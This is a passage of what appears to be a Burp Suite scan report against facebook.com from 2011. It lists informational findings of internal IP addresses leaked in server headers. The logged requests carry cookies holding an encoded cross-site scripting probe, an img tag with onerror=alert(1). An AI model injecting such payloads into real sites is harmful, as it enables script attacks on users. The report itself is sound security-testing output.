GET /pages/University-of-Chicago-Semester-in-Madrid/144554762263161 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.159.71
Connection: close
Date: Thu, 05 May 2011 11:41:50 GMT
Content-Length: 27242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.238. http://www.facebook.com/pages/create.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/create.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.198.33

Request

GET /pages/create.php?ref_type=sitefooter HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.198.33
Connection: close
Date: Thu, 05 May 2011 11:42:03 GMT
Content-Length: 32245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.239. http://www.facebook.com/pages/create.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/create.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.33.28.109

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.28.109
Connection: close
Date: Thu, 05 May 2011 10:56:39 GMT
Content-Length: 32043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.240. http://www.facebook.com/pages/create.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/create.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.139.29

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.29
Connection: close
Date: Thu, 05 May 2011 11:42:03 GMT
Content-Length: 32043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.241. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/memorial-high-school-west-new-york-nj/114508558584580

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.134.53

Request

GET /pages/memorial-high-school-west-new-york-nj/114508558584580 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.134.53
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 27189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.242. http://www.facebook.com/patroyo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /patroyo

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.144.31

Request

GET /patroyo HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.144.31
Connection: close
Date: Thu, 05 May 2011 11:42:38 GMT
Content-Length: 48049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.243. http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky%20-Jordan/1242845259

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.187.63

Request

GET /people/Alexander-Bucky%20-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; wd=1022x1007

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.187.63
X-Cnection: close
Date: Thu, 05 May 2011 11:56:54 GMT
Content-Length: 0


20.244. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky-Jordan/1242845259

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.194.41

Request

GET /people/Alexander-Bucky-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.41
Connection: close
Date: Thu, 05 May 2011 11:43:07 GMT
Content-Length: 15014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.245. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky-Jordan/1242845259

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.157.53

Request

GET /people/Alexander-Bucky-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.157.53
X-Cnection: close
Date: Thu, 05 May 2011 11:56:56 GMT
Content-Length: 44258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.246. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan%20/100000824820783

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.184.45

Request

GET /people/Bucky-Jordan%20/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; wd=907x1007

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Bucky-Jordan/100000824820783
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.184.45
X-Cnection: close
Date: Thu, 05 May 2011 11:39:24 GMT
Content-Length: 0


20.247. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan%20/100000824820783

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.169.25

Request

GET /people/Bucky-Jordan%20/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; wd=907x1007

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Bucky-Jordan/100000824820783
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.169.25
X-Cnection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 0


20.248. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan%20/100000824820783

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.104.59

Request

GET /people/Bucky-Jordan%20/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; wd=907x1007

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Bucky-Jordan/100000824820783
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.104.59
X-Cnection: close
Date: Thu, 05 May 2011 11:39:24 GMT
Content-Length: 0


20.249. http://www.facebook.com/people/Bucky-Jordan/100000824820783

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan/100000824820783

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.144.25

Request

GET /people/Bucky-Jordan/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.144.25
X-Cnection: close
Date: Thu, 05 May 2011 11:39:27 GMT
Content-Length: 56884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.250. http://www.facebook.com/people/Bucky-Jordan/100000824820783

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan/100000824820783

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.36.233.110

Request

GET /people/Bucky-Jordan/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bYeMg; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.233.110
X-Cnection: close
Date: Thu, 05 May 2011 02:50:59 GMT
Content-Length: 56884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.251. http://www.facebook.com/people/Bucky-Jordan/100000824820783

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan/100000824820783

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.199.31

Request

GET /people/Bucky-Jordan/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
